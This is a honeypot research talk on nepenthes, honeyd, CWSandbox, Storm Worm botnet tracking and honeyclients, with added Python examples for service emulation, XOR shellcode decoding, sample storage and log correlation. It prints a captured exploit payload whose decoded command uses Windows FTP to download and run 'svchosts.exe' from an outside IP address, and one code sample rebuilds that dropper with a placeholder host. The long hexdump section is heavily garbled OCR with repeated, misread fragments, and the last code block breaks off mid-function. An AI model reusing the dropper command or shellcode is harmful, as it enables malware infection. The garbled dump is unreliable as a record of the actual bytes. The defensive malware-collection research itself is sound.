• Honeypot 101

• Examples

  • honeyd

  • nepenthes

• Honeyclients

• Conclusion
Honeypots

• Network-based measurements often show us only the results of attacks

  • Scanning activity caused by worms

  • Spam sent via botnets

• How to learn more about the attackers?

• “A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource” (Know Your Enemy)
Honeypots

High-interaction                                   Low-interaction
Real services, OSs, or applications                Emulation of TCP/IP stack, vulnerabilities, ...
Higher risk                                        Lower risk
Hard to deploy / maintain                          Easy to deploy / maintain
Capture extensive amount of information            Capture quantitative information about attacks
Example: Gen III honeynets                         Examples: honeyd, nepenthes, labrea, ...
honeyd

• Low-interaction honeypot written by Niels Provos

• Available at http://honeyd.org

• Virtualization of the TCP/IP stack

  • Fools tools like nmap & xprobe

• Complex setups possible

  • Latency, packet loss, bandwidth, ...

  • Can emulate complex network setups
Malware Collection

• Hundreds of new malware samples each month

• How to learn more about malware?

  • Quantitative information

  • Qualitative information

  • Information about new malware

• Usage of honeypot-based techniques

  • Use deception & emulation
nepenthes

• Tool to automatically “collect” malware like bots and other autonomously spreading malware

• Emulates known vulnerabilities and downloads the malware that tries to exploit these vulnerabilities

• Available at http://nepenthes.mwcollect.org

Schematic Overview

[Figure: schematic overview of the nepenthes modules; the diagram itself is not recoverable from the extraction]
Vulnerability modules

• Emulate vulnerable services

  • Play with exploits until they send us their payload (finite state machine)

• Currently more than 20 vulnerability modules available

  • More in development

• Analysis of known vulnerabilities & exploits necessary

  • Automation possible?
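What the finite state machine of a vulnerability module looks like, as an added example (this is not nepenthes code): a made-up line-based service walks the peer through banner, LOGIN and DATA stages, captures only the bytes announced in the DATA stage as the payload, and resets on any deviation, so that scanners and wrong exploits never get past the dialogue. The protocol, its replies and the client messages in run_dialogue are all assumptions for the example.

```python
"""Finite-state-machine emulation of a vulnerable service, honeypot side.

Added example in the style of a nepenthes vulnerability module; the protocol
(banner -> LOGIN -> DATA <len> -> payload) is invented for illustration.
"""
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class EmulatedService:
    """Tracks one TCP connection through the emulated protocol."""
    state: str = "BANNER"          # BANNER -> AUTH -> CMD -> DATA -> DONE
    expected: int = 0              # bytes still owed in the DATA stage
    payload: bytearray = field(default_factory=bytearray)
    log: List[str] = field(default_factory=list)

    def banner(self) -> bytes:
        """Greeting sent on connect; moves the machine to the AUTH stage."""
        self.state = "AUTH"
        return b"220 fake-svc ready\r\n"

    def feed(self, data: bytes) -> Optional[bytes]:
        """Consume bytes from the peer and return the reply to send, if any."""
        if self.state == "AUTH":
            # Accept any credentials: the goal is to reach the payload stage.
            if data.startswith(b"LOGIN "):
                self.state = "CMD"
                return b"230 ok\r\n"
            return self._reset("unexpected input before LOGIN")
        if self.state == "CMD":
            if data.startswith(b"DATA "):
                try:
                    self.expected = int(data.split()[1])
                except (IndexError, ValueError):
                    return self._reset("bad DATA length")
                if self.expected <= 0 or self.expected > (1 << 20):
                    return self._reset("implausible DATA length")
                self.state = "DATA"
                return b"354 send payload\r\n"
            if data.startswith(b"QUIT"):
                self.state = "DONE"
                return b"221 bye\r\n"
            return b"500 unknown command\r\n"
        if self.state == "DATA":
            # This is the only stage whose bytes are kept: the exploit payload.
            self.payload += data
            if len(self.payload) >= self.expected:
                self.state = "DONE"
                self.log.append("payload captured: %d bytes" % len(self.payload))
                return b"250 stored\r\n"
            return None            # keep reading until the announced length arrives
        return None

    def _reset(self, reason: str) -> bytes:
        """Any deviation from the expected dialogue restarts the machine."""
        self.log.append("reset: " + reason)
        self.state = "AUTH"
        self.payload.clear()
        return b"500 syntax error\r\n"

    def captured_payload(self) -> Optional[bytes]:
        """The payload, once the dialogue ran to completion; None otherwise."""
        if self.state == "DONE" and self.payload:
            return bytes(self.payload)
        return None


def run_dialogue(messages):
    """Drive one emulated connection with a list of constructed client messages."""
    svc = EmulatedService()
    replies = [svc.banner()]
    for m in messages:
        r = svc.feed(m)
        if r is not None:
            replies.append(r)
    return svc, replies


if __name__ == "__main__":
    # Constructed exploit-like dialogue: the payload arrives in two TCP segments.
    svc, replies = run_dialogue([b"LOGIN bot\r\n", b"DATA 8\r\n", b"\x90" * 5, b"\x90" * 3])
    print(svc.log, svc.captured_payload())
    # Constructed scanner: a stray HTTP request never gets past the AUTH stage.
    svc, replies = run_dialogue([b"GET / HTTP/1.0\r\n"])
    print(svc.log, svc.captured_payload())
```

A real module emulates the exact request sequence of one known exploit instead of a made-up protocol, which is why the slides note that analysis of the vulnerability and its exploits has to come first.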
Shellcode modules

• shellcode-generic, shellemu winnt, shellcode-signatures

• Automatically extract the URL used by malware to transfer itself to the compromised machine

• Generic XOR decoder

• sch_generic_createprocess

• sch_generic_url

• sch_generic_cmd
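How the generic XOR decoder and the URL extraction fit together, as an added example modelled on the idea of sch_generic_url / sch_generic_cmd but not taken from nepenthes: the decoder brute-forces a single-byte key and keeps the candidate that exposes the most known markers (“cmd”, “echo”, “ftp”, “://”, “.exe”), then the extractor either finds a literal HTTP/FTP/TFTP URL or rebuilds one from the echo-ed FTP script that captured payloads of the kind shown below use. The two encoded blobs, their keys and the 192.0.2.x addresses are constructed for the example.

```python
"""Generic single-byte XOR decoding and download-URL extraction for captured shellcode.

Added example, not nepenthes code. Inputs are constructed: a plaintext is
XOR-encoded here so that the decoder has something to recover.
"""
import re

# Strings that a decoded download stub almost always contains.
MARKERS = (b"://", b"cmd", b"echo", b"ftp", b".exe")

URL_RE = re.compile(rb"(?:https?|tftp|ftp)://[\w.\-:@/%?=&+]+", re.IGNORECASE)

# 'echo open HOST [PORT] >> f & echo user U P >> f & ... & echo get FILE >> f & ftp -s:f'
FTP_SCRIPT_RE = re.compile(
    rb"open\s+(?P<host>[\w.\-]+)(?:\s+(?P<port>\d+))?.*?"
    rb"user\s+(?P<user>\S+)\s+(?P<pw>\S+).*?get\s+(?P<file>[\w.\-]+)",
    re.IGNORECASE | re.DOTALL,
)


def printable_score(buf: bytes) -> float:
    """Fraction of bytes that are printable ASCII or common whitespace."""
    ok = sum(1 for b in buf if 32 <= b < 127 or b in (9, 10, 13))
    return ok / max(len(buf), 1)


def score(buf: bytes):
    """Rank a decoding candidate: number of distinct markers first, then printability."""
    hits = sum(1 for m in MARKERS if m in buf.lower())
    return (hits, printable_score(buf))


def xor_bruteforce(buf: bytes):
    """Try every single-byte key and return (key, decoded) for the best-scoring one."""
    best_key, best_dec, best_score = 0, buf, score(buf)
    for key in range(1, 256):
        dec = bytes(b ^ key for b in buf)
        s = score(dec)
        if s > best_score:
            best_key, best_dec, best_score = key, dec, s
    return best_key, best_dec


def extract_url(decoded: bytes):
    """Return the download URL found in decoded shellcode, or None."""
    m = URL_RE.search(decoded)
    if m:
        return m.group(0).decode("ascii", "replace")
    m = FTP_SCRIPT_RE.search(decoded)
    if m:
        host = m.group("host").decode()
        if m.group("port"):
            host += ":" + m.group("port").decode()
        return "ftp://%s:%s@%s/%s" % (
            m.group("user").decode(), m.group("pw").decode(), host, m.group("file").decode())
    return None


def analyse(blob: bytes):
    """Decode a captured blob and pull the download location out of it."""
    key, decoded = xor_bruteforce(blob)
    return key, extract_url(decoded)


def xor_bytes(buf: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in buf)


# Constructed samples: an FTP-script dropper command and a plain HTTP URL, each XOR-encoded.
PLAIN_FTP = (b"\x90\x90cmd /c echo open 192.0.2.10 6201 >> ii &echo user a a >> ii "
             b"&echo binary >> ii &echo get svchosts.exe >> ii &echo bye >> ii "
             b"&ftp -n -v -s:ii &del ii &svchosts.exe\r\n")
ENCODED_FTP = xor_bytes(PLAIN_FTP, 0x99)
PLAIN_HTTP = b"\x31\xc0http://192.0.2.20/load/x.exe\x00"
ENCODED_HTTP = xor_bytes(PLAIN_HTTP, 0x37)

if __name__ == "__main__":
    print(analyse(ENCODED_FTP))    # (153, 'ftp://a:a@192.0.2.10:6201/svchosts.exe')
    print(analyse(ENCODED_HTTP))   # (55, 'http://192.0.2.20/load/x.exe')
```

Scoring on markers rather than on printability alone matters: keys that differ from the real one only in low bits turn the plaintext into text that is still mostly printable, so a printability-only score picks the wrong key for lowercase-heavy payloads.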
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[ dia 

] 

— 

— 

— 

— 

---[ hexdump(0xlbf7bb68 , 

0x000010c3) 

]- 

— 

— 


[ dia 

: 

0X0000 

00 

00 

10 

bf 

ff 

53 

4d 

4Z 

73 

00 

00 

00 

00 

18 

07 

c8 

SMB 

s 


[ dia 

: 

0X0010 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

37 

13 


7. 


[ dia 

: 

0X00Z0 

00 

00 

00 

00 

0c 

ff 

00 

00 

00 

04 

11 

0a 

00 

00 

00 

00 



c 

[ dia 

: 

0x0030 

00 

00 

00 

7e 

10 

00 

00 

00 

00 

d4 

00 

00 

80 

7e 

10 

60 

• • • • • • • 

V 

/N/ 

o 

[ dia 
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0x0040 

82 

10 

7a 

06 

06 

2b 

06 

01 

05 

05 

02 

a0 

82 

10 

6e 

30 

. .Z. . 

n0 


[ dia 

: 

0x0050 

82 

10 

6a 

al 

82 

10 

66 

23 

82 

10 

62 

03 

82 

04 

01 

00 

. . j . . . f # 

b 

• • L/ • • • • • 

u 

£ 

[ dia 
[...] 

: 

0x0060 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAA 

AAAAAAAA 

CD 

[ dia 

: 

0x0450 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAA 

AAAAAAAA 

"5 

[ dia 

: 

0x0460 

03 

00 

23 

82 

0c 

57 

03 

82 

04 

0a 

00 

90 

4Z 

90 

4Z 

90 

. .#. .W. . 

. . . . B . B . 

to 

[ dia 

: 

0x0470 

4Z 

90 

4Z 

81 

c4 

54 

f2 

ff 

ff 

fc 

e8 

46 

00 

00 

00 

8b 

B . B . . T . . 

• • • F • • • • 

to 

<D 

[ dia 

: 

0x0480 

45 

3c 

8b 

7c 

05 

78 

01 

ef 

8b 

4f 

18 

8b 

5f 

20 

01 

eb 

E<. 1 .x. . 

. 0 . ._ . . 

u 

U 

3 

[ dia 

: 

0x0490 

e3 

2e 

49 

8b 

34 

8b 

01 

ee 

31 

C0 

99 

ac 

84 

C0 

74 

07 

. .1.4. . . 

1 t. 

[ dia 

: 

0x04a0 

Cl 

ca 

0d 

01 

cZ 

eb 

f4 

3b 

54 

Z4 

04 

75 

e3 

8b 

5f 

Z4 

9 

T$.u. ._$ 

to 

[ dia 

: 

0x04b0 

01 

eb 

66 

8b 

0c 

4b 

8b 

5f 

lc 

01 

eb 

8b 

lc 

8b 

01 

eb 

. .f. . K._ 


CD 

[ dia 

: 

0x04c0 

89 

5c 

Z4 

04 

c3 

31 

C0 

64 

8b 

40 

30 

85 

C0 

78 

0f 

8b 

.\$. .l.d 

. @0 . . x . . 

j-J 

[ dia 

: 

0x04d0 

40 

0C 

8b 

70 

lc 

ad 

8b 

68 

08 

e9 

0b 

00 

00 

00 

8b 

40 

.p. . .h 

@ 


[ dia 

: 

0x04e0 

34 

05 

7c 

00 

00 

00 

8b 

68 

3c 

5f 

31 

f6 

60 

56 

eb 

0d 

4 . 1 .... h 

<_1.'V. . 

"O 

CD 

[ dia 

: 

0x04f0 

68 

ef 

ce 

e0 

60 

68 

98 

fe 

8a 

0e 

57 

ff 

e7 

e8 

ee 

ff 

h. . . 'h. . 

. .w 

> 

[ dia 

: 

0x0500 

ff 

ff 

63 

6d 

64 

20 

2f 

63 

20 

65 

63 

68 

6f 

20 

6f 

70 

. . cmd /c 

echo op 

CD 

(j 

[ dia 

: 

0x0510 

65 

6e 

20 

38 

34 

2e 

31 

37 

38 

2e 

35 

34 

2e 

32 

33 

39 

en 84.17 

8.54.239 

CD 

[ dia 

: 

0X05Z0 

20 

36 

32 

30 

31 

20 

3e 

3e 

20 

69 

69 

20 

26 

65 

63 

68 

6201 » 

ii &ech 

1 1 

[ dia 

: 

0x0530 

6f 

20 

75 

73 

65 

7Z 

20 

61 

20 

61 

20 

3e 

3e 

20 

69 

69 

o user a 

a » ii 

u 

[ dia 

: 

0x0540 

20 

26 

65 

63 

68 

6f 

20 

62 

69 

6e 

61 

7Z 

79 

20 

3e 

3e 

&echo b 

inary » 

_o 

[ dia 

: 

0x0550 

20 

69 

69 

20 

26 

65 

63 

68 

6f 

20 

67 

65 

74 

20 

73 

76 

ii &ech 

o get sv 


[ dia 

: 

0x0560 

63 

68 

6f 

73 

74 

73 

2e 

65 

78 

65 

20 

3e 

3e 

20 

69 

69 

chosts.e 

xe » ii 

Q_ 

[ dia 

: 

0x0570 

20 

26 

65 

63 

68 

6f 

20 

62 

79 

65 

20 

3e 

3e 

20 

69 

69 

&echo b 

ye » ii 


[ dia 

: 

0x0580 

20 

26 

66 

74 

70 

20 

2d 

6e 

20 

2d 

76 

20 

2d 

73 

3a 

69 

&ftp -n 

-v -s:i 


[ dia 

: 

0x0590 

69 

20 

26 

64 

65 

6c 

20 

69 

69 

20 

26 

73 

76 

63 

68 

6f 

i &del i 

i &svcho 


[ dia 

: 

0x05a0 

73 

74 

73 

2e 

65 

78 

65 

0d 

0a 

00 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

sts.exe. 

. . BBBBBB 


[ dia 

: 

0x05b0 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

BBBBBBBB 

BBBBBBBB 
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U 
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to 
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U 

CD 
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dia 
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dia 
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] 


] 


] 


] 


] 


] 


] 


0x0000 

0x0010 

0X00Z0 

0x0030 

0x0040 

0x0050 

0x0060 
















































0x0540 

0x0550 

0x0560 

0x0570 

0x0580 

0x0590 

0x05a0 

0x05b0 


00 00 
00 00 
00 00 
00 00 
82 10 
82 10 
41 41 


[ hexdump(0xlbf7bb68 , 

10 bf ff 55 4d 42 75 00 00 

00 00 00 00 00 00 
00 00 0c ff 00 00 
00 7e 10 00 00 00 
7a 06 06 2b 06 01 
6a al 82 10 66 25 
41 41 41 41 41 41 


00 00 00 
00 04 11 
00 d4 00 
05 05 02 
82 10 62 
41 41 41 


0x000010c5) ]- 
00 00 18 07 c8 
00 00 00 57 15 
0a 00 00 00 00 
00 80 7e 10 60 
a0 82 10 6e 50 
05 82 04 01 00 
41 41 41 41 41 


SMB s 




20 26 
20 69 
65 68 
20 26 
20 26 
69 20 
75 74 
42 42 


65 65 
69 20 
6f 75 

65 65 

66 74 
26 64 
75 2e 
42 42 


68 6f 
26 65 
74 75 
68 6f 
70 20 
65 6c 
65 78 
42 42 


20 62 
65 68 
2e 65 
20 62 
2d 6e 
20 69 
65 0d 
42 42 


69 6e 
6f 20 

78 65 

79 65 
20 2d 
69 20 
0a 00 
42 42 


61 72 
67 65 
20 5e 
20 5e 
76 20 
26 75 
42 42 
42 42 


79 20 
74 20 
5e 20 
5e 20 
2d 75 
76 65 
42 42 
42 42 


5e 5e 
75 76 
69 69 
69 69 
5a 69 
68 6f 
42 42 
42 42 


7. 


z. .+ 


n0 


-j fit h 

• • ■•••I// •• L/ • • • • • 

AAAAAAAA AAAAAAAA 


and /c 
echo 

open 84.178.54.239 

» 

• • 
ii 

ft 

& 

j 

echo 

user a a 

» 

• • 
ii 

& 

echo 

binary 

» 

• • 
ii 

& 

j 

echo 

get svchosts.exe 

» 

• • 
ii 

& 

echo 

bye 

» 

• • 
ii 

& 

ftp -n -v -s:ii 
del ii 

) 

svchosts.exe 

\ ... . . 



& 

o 1 
“ E 

E 

. . . . C 


.W. 
.T. 
.x. 
4. . 


AAAAAAAA 
. B . B . 
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• • • > 

. K._ 

.l.d 


.0 

1. 

T$ 


• • • L • 
u. ._$ 


• ••••• 


. @0 . . X 


. . .h 
'h. . 


<_1.'V 
. .W. . . 


@ 


01 » 


&echo b 
ii &ech 
chosts.e 
&echo b 
&ftp -n 
i &del i 
sts.exe. 
BBBBBBBB 


echo op 
8.54.Z39 
ii &ech 
a » ii 
inary » 

0 get sv 
xe » ii 
ye » ii 

-v -s:i 

1 &svcho 
. . BBBBBB 
BBBBBBBB 



o 
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4-J 


E 

<u 


tO 

to 

CD 

U 

U 


to 


CD 


a> 

> 


CD 

U 

CD 

L- 


n 

O 


CL 
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[ 

[ 

[ 
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] 


] 


] 


] 


] 


] 


] 


0x0000 

0x0010 

0X00Z0 

0x0030 

0x0040 

0x0050 

0x0060 



] 



00 00 
00 00 
00 00 
00 00 
8Z 10 
8Z 10 
41 41 


[ hexdump(0xlbf7bb68 , 

10 bf ff 53 4d 4Z 73 00 00 
00 00 00 00 00 00 
00 00 0c ff 00 00 
00 7e 10 00 00 00 
7a 06 06 Zb 06 01 
6a al 8Z 10 66 Z3 
41 41 41 41 41 41 


00 00 00 
00 04 11 
00 d4 00 
05 05 0Z 
8Z 10 6Z 
41 41 41 


0x000010c3) ] = 

00 00 18 07 c8 SMB s 

00 00 00 37 13 7. 

0a 00 00 00 00 

00 80 7e 10 60 . . . ~ ~ . 

a0 8Z 10 6e 30 ..z.. + n0 

03 8Z 04 01 00 . . j. . .f# . .b 

41 41 41 41 41 AAAAAAAA AAAAAAAA 


and /c 
echo 

open 84.178.54.239 

» 

• • 
ii 

& 

j 

echo 

user a a 

» 

• • 
ii 

& 

echo 

binary 

» 

• • 
ii 

& 

j 

echo 

get svchosts.exe 

» 

• • 
ii 

& 

echo 

bye 

» 

• • 
ii 

& 

ftp -n -v -s:ii 
del ii 

) 

svchosts.exe 



& 

o 1 
“ E 

E 

. . . . c 


.W. 
.T. 
.x. 
4. . 


AAAAAAAA 
. B . B . 
F 


• • • 


.0 

1. 

T$ 


. K._ 
.l.d 


• • • L • 
u. ._$ 


• ••••• 


. @0 . . X 


. . .h 
'h. . 


<_1.'V 
. .W. . . 


@ 


]0x ft P ://a:a@84. 1 78.54.239/svchosts 


] 0x0580 
] 0x0590 
] 0x05a0 
] 0x05b0 


Z0 Z6 66 74 70 Z0 Zd 6e 
69 Z0 Z6 64 65 6c Z0 69 
73 74 73 Ze 65 78 65 0d 
4Z 4Z 4Z 4Z 4Z 4Z 4Z 4Z 


Z0 Zd 76 Z0 Zd 73 3a 69 
69 Z0 Z6 73 76 63 68 6f 
0a 00 4Z 4Z 4Z 4Z 4Z 4Z 
4Z 4Z 4Z 4Z 4Z 4Z 4Z 4Z 


&ftp -n 
i &del i 
sts.exe. 
BBBBBBBB 


echo op 
8.54.Z39 
ii &ech 
a » ii 
inary » 

0 get sv 
xe » ii 
ye » ii 

-v -s:i 

1 &svcho 
. . BBBBBB 
BBBBBBBB 




Download modules

• download-{http,tftp}: handles HTTP / TFTP URIs

• download-ftp: the FTP client from Windows is not RFC compliant...

• download-{csend,creceive}

• download-link: links //10.0.0.1/HJ4G==

Thorsten Holz • Laboratory for Dependable Distributed Systems • Troopers 2008 • Universität Mannheim



Submission modules

• submit-file: write file to hard disk

• submit-{mysql,postgres,mssql}: store file in database

• submit-norman: submit file to sandboxes for analysis

• submit-http: send file via HTTP POST
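Putting the download and submission modules together, as an added example (not nepenthes code): the URI scheme selects the download module, and a submit-file step stores each binary once under its MD5, which is also how a “unique binaries based on md5sum” figure like the one on the statistics slide comes about. The sample bytes, URIs and directory are constructed, the scheme names for the csend/creceive/link modules are assumptions, and nothing is fetched from the network.

```python
"""Download-module dispatch by URI scheme and a submit-file store keyed by MD5.

Added example, not nepenthes code. The scheme-to-module table mirrors the
module names on the slides; the scheme strings for csend/creceive/link are
assumed, the slides do not spell them out.
"""
import hashlib
import os
import tempfile
from urllib.parse import urlsplit

DOWNLOAD_MODULES = {
    "http": "download-http",
    "tftp": "download-tftp",
    "ftp": "download-ftp",
    "csend": "download-csend",        # assumed scheme names
    "creceive": "download-creceive",
    "link": "download-link",
}


def select_download_module(uri: str) -> str:
    """Pick the download module for a URI; unknown schemes are an error, not a guess."""
    scheme = urlsplit(uri).scheme.lower()
    try:
        return DOWNLOAD_MODULES[scheme]
    except KeyError:
        raise ValueError("no download module for scheme %r" % scheme)


class FileStore:
    """submit-file: write each sample to disk exactly once, named by its MD5."""

    def __init__(self, directory: str):
        self.directory = directory
        self.downloads = 0      # every successful download, duplicates included
        self.unique = 0         # distinct binaries by hash
        os.makedirs(directory, exist_ok=True)

    def submit(self, data: bytes, source_uri: str):
        """Store data; return (md5, is_new) and record where the sample came from."""
        digest = hashlib.md5(data).hexdigest()
        path = os.path.join(self.directory, digest)
        self.downloads += 1
        is_new = not os.path.exists(path)
        if is_new:
            self.unique += 1
            tmp = path + ".part"
            with open(tmp, "wb") as f:
                f.write(data)
            os.replace(tmp, path)   # atomic rename: never leaves a half-written sample
        with open(path + ".sources", "a") as f:   # provenance: every URI that served it
            f.write(source_uri + "\n")
        return digest, is_new


def demo():
    """Two constructed downloads of the same constructed sample from different URIs."""
    store = FileStore(tempfile.mkdtemp(prefix="submit-file-demo-"))
    sample = b"MZ\x90\x00constructed-sample-not-a-real-binary"
    first = store.submit(sample, "ftp://a:a@192.0.2.10/svchosts.exe")
    second = store.submit(sample, "http://192.0.2.20/x.exe")
    return {
        "first": first,
        "second": second,
        "downloads": store.downloads,
        "unique": store.unique,
        "module": select_download_module("tftp://192.0.2.5/x.exe"),
    }


if __name__ == "__main__":
    print(demo())
```

The ratio of the two counters is what the statistics slide reports: millions of downloads collapse to a few thousand distinct binaries, because the same bots push the same file to every sensor address they hit.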
CWSandbox

[Screenshot: CWSandbox web interface v2, “Analysis Details” page of a submitted sample, with links to the XML/TXT/HTML reports, the sample itself, the CAB archive and the PCAP recorded during the run]
Statistics: nepenthes

• Eight weeks (December ’06 / January ’07), nepenthes on ~8,000 IP addresses on one physical machine:

  • 13,000,000+ files downloaded

  • 2,600+ unique binaries based on md5sum

  • ~300 different botnets

Detection rate (%) on the complete set of 2,634 samples:

AV 1    AV 2    AV 3    AV 4
92.5    86.9    79.7    73.8

• One bot variant dominates the collection
Statistics

[Figure: four pie charts of the top malware families in the collection as named by four AV engines (AntiVir, BitDefender, Sophos, ClamAV). Legends as extracted, AntiVir first, BitDefender second, then the remaining two:
AntiVir: Worm/Korgo, W32/Parite, GoBot, PadoBot, Doomber, W32/Virut, RBot, SDBot, Zapchast, Sasser.
BitDefender: Worm/Korgo, SDBot, GoBot, Zapchast, GhostBot, PadoBot, RBot, Sasser, W32/Parite, PoeBot.
GoBot, Korgo, W32/Parite, W32/Virut, RBot, Sasser, Blaster, PoeBot, Dabber, SDBot.
PadoBot, GoBot, Korgo, SDBot, IRCBot, hyBot, GhostBot, W32/Parite, Sasser, PoeBot.
The slice percentages cannot be mapped back to the families from the extraction.]
Tracking Botnets

• Learning more about botnets with honeypots

  1. Collect samples with honeypots

  2. Automated analysis, e.g., cwsandbox.org

  3. Join botnet and observe from inside

• “Know Your Enemy: Tracking Botnets”

• LEET’08: “Measurements and Mitigation of P2P-based Botnets: A Case Study on Storm Worm”
[Figure: spam mails sent by one infected Storm machine over several days]

[Screenshot: a Storm Worm lure page titled “Dancing Skeleton”, served directly from a bot’s IP address]
Inside Storm

• Network-level behavior

  • First versions: Overnet (Kademlia-based DHT)

  • Obfuscation was added in October 2007

    • Called Stormnet in the following

  • Seems to change from DHT to linked list

  • Only bots present in Stormnet
Inside Storm

• Bot communication (simplified, valid for Overnet)

  • Infected machine searches for specific keys within the network

  • Botmaster knows in advance which keys are searched for => publishes commands there

[Figure: honeypot setup: the honeypot reaches the Internet only through a modified firewall (“Truman Box”)]
Modes

Two different modes: NAT or public IP address

[Figure: Storm network structure: spam/DoS bots, gateways, controller]

Actually Storm Worm is a hybrid network with a P2P component for lookup

Results

[Figure: diurnal pattern in Stormnet size]

Results

[Figure: number of bots in Stormnet, split by geo-location]
Honeyclients

Tracking New Attack Vectors

Malicious Websites

• More and more attacks against browsers

  • Operating systems get better and better

  • Applications become the weakest link in the chain

• Drive-by download to install malware

  • Malicious website sends several exploits to the visitor (typically encoded, not easy to detect)

  • If one exploit is successful, malware is installed
Malicious Websites

• Social engineering is also common

  • Trick user into downloading executable

  • Often related to greeting cards or adult content

  • Examples: Storm Worm and Zlob

• Malicious results in search engines

  • Attackers place sites within Google’s search index => requests return these malicious sites

  • ~1-2% of search results are malicious
Malicious Websites

• Analyzed several billion URLs and executed an in-depth analysis of 4.5M URLs

• Found 450,000 malicious sites downloading a binary to the honeypot, 700,000 additional malicious sites

[Figure: analysis pipeline: Web Page Repository → MapReduce heuristical URL extraction → URL → Virtual Machine (Internet Explorer + Monitor) → Execution Analysis → Result → Malicious Page Repository]

Provos et al., “The Ghost in the Browser: Analysis of Web-based Malware”, HotBots’07
Social Engineering

[Screenshot: a copy of the Microsoft Download Center page for “Security Update for Windows XP (KB923810)” (bulletin MS07-055, date published 10/8/2007, 989 KB), served from a non-Microsoft URL whose query string carries a base64-encoded parameter; the lure offers a fake security update for download]

Social Engineering
[Screenshot: a “DVDaccess” site telling the visitor to “install access software”, described as multimedia software that “allows video access” and improves audio quality, a fake codec lure for downloading an executable]
Backends

[Screenshot: web statistics backend of a botnet, “Bot traffic statistics”, generated on 2007/11/14: top-10 countries of infected hosts (United States 15,132 bots, 99%; the remaining countries in the single or double digits), top-10 new countries today (United States 2,372, 99%), bot versions (3.6.14: 15,549 bots, 100%), bot reports by country (United States 90,831, 99%; 92,177 reports in total), bot count 15,555, 4,483 new bots today, 5,470 bot reports today]
Backends

MPack

[Screenshot: MPack v0.90 statistics page (server snapshot 9 Sep 2007 00:11:13): attacked hosts total / unique by browser and OS (IE on XP 14,291 / 13,069; Windows 2000 449 / 404; Firefox 1,643 / 1,622; Opera 7 44 / 38), total traffic 17,720 / 16,119, “exploited” 7,161 / 2,938, module state (MySQL-based statistics, user blocking and country blocking off), and a per-country traffic table led by Israel (8,140, 45.9%), United States (2,695, 15.2%), Russian Federation (1,956, 11%), unknown country (1,000, 5.6%) and Spain (825, 4.7%)]
Honeyclients

• Automatically search for malicious websites

  • Simulate browsing behavior

  • Closely observe system and detect anomalies

• HoneyMonkey (NDSS’06), Capture-HPC, HoneyC, HoneyClient, phoneyc, ...

• Can be generalized to learn more about attacks against all kinds of client applications

  • User simulation needed?
Honeyclients

• Capture-HPC (https://projects.honeynet.org/capture-hpc)

  • Client/Server model

  • Analyze website with IE or other browser
Honeyclients

Capture-HPC visit log (timestamp, state, URL, browser client, value):

"24.03.2008 05:27:44","visiting","http://adv.gratuito.st","iexplore","10"
"24.03.2008 05:28:35","error0: NETWORK_ERROR-2148270085","http://adv.gratuito.st","iexplore","10"
"24.03.2008 05:29:35","visiting","http://adview.ppro.de","iexplore","10"
"24.03.2008 05:30:33","error0: NETWORK_ERROR-404","http://adview.ppro.de","iexplore","10"
"24.03.2008 05:31:29","visiting","http://adv.imho.se","iexplore","10"
"24.03.2008 05:32:04","error0: NETWORK_ERROR-2148270085","http://adv.imho.se","iexplore","10"
"24.03.2008 11:55:00","visiting","http://ai.hitbox.com","iexplore","10"
"24.03.2008 11:56:00","visited","http://ai.hitbox.com","iexplore","10"
"24.03.2008 11:57:15","visiting","http://aimphuck.com","iexplore","10"
"24.03.2008 11:58:45","visited","http://aimphuck.com","iexplore","10"
Honeyclients

Capture-HPC file and process events recorded during a visit (kind, timestamp, actor, action, target):

"file","24/3/2008 20:37:56.717","C:\Programme\Internet Explorer\iexplore.exe","Write","C:\syst.exe"
"file","24/3/2008 20:37:56.702","System","Write","C:\WINDOWS\Temp\dnlsvc.exe"
"file","24/3/2008 20:37:57.452","System","Write","C:\syst.exe"
"process","24/3/2008 20:37:57.733","C:\Programme\Internet Explorer\iexplore.exe","created","C:\syst.exe"
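Turning the two Capture-HPC logs into a verdict, as an added example (not part of Capture-HPC): the visit log gives the time window of each URL, the file/process log gives what happened on the client, and a URL is flagged when, inside its window, a file is written outside the browser’s profile directory or a new process is created. The log lines in the block are constructed in the same shape as the ones above, with example.net / example.org in place of real sites; the allow-listed path prefix is an assumption.

```python
"""Correlate Capture-HPC style visit and event logs to flag drive-by downloads.

Added example, not Capture-HPC code. The two logs below are constructed in the
shape of the real ones: visit log = (timestamp, state, URL, client, value),
event log = (kind, timestamp, actor, action, target).
"""
import csv
import io
from datetime import datetime

# Constructed visit log: one clean visit, one that ended in a network error.
VISIT_LOG = '''"24.03.2008 20:37:40","visiting","http://example.net","iexplore","10"
"24.03.2008 20:38:10","visited","http://example.net","iexplore","10"
"24.03.2008 20:38:20","visiting","http://example.org","iexplore","10"
"24.03.2008 20:38:50","error0: NETWORK_ERROR-404","http://example.org","iexplore","10"
'''

# Constructed events: an executable dropped by the browser, a service written by
# the system, the dropped file started, and one harmless cache write.
EVENT_LOG = '''"file","24/3/2008 20:37:56.717","C:\\Programme\\Internet Explorer\\iexplore.exe","Write","C:\\syst.exe"
"file","24/3/2008 20:37:56.702","System","Write","C:\\WINDOWS\\Temp\\dnlsvc.exe"
"process","24/3/2008 20:37:57.733","C:\\Programme\\Internet Explorer\\iexplore.exe","created","C:\\syst.exe"
"file","24/3/2008 20:37:58.100","C:\\Programme\\Internet Explorer\\iexplore.exe","Write","C:\\Documents and Settings\\user\\Local Settings\\Temporary Internet Files\\page.htm"
'''

# Writes under the browser profile are ordinary browsing; anything else is an anomaly (assumed allow-list).
ALLOWED_WRITE_PREFIXES = ("C:\\Documents and Settings\\",)


def parse_visits(text):
    """Pair each 'visiting' line with the line that closes it; return closed visits."""
    visits, open_visits = [], {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 5:
            continue
        ts, state, url, _client, _value = row
        t = datetime.strptime(ts.strip(), "%d.%m.%Y %H:%M:%S")
        if state == "visiting":
            open_visits[url] = {"url": url, "start": t, "end": None, "result": None}
        else:                      # 'visited' or an error state closes the window
            v = open_visits.pop(url, None)
            if v is not None:
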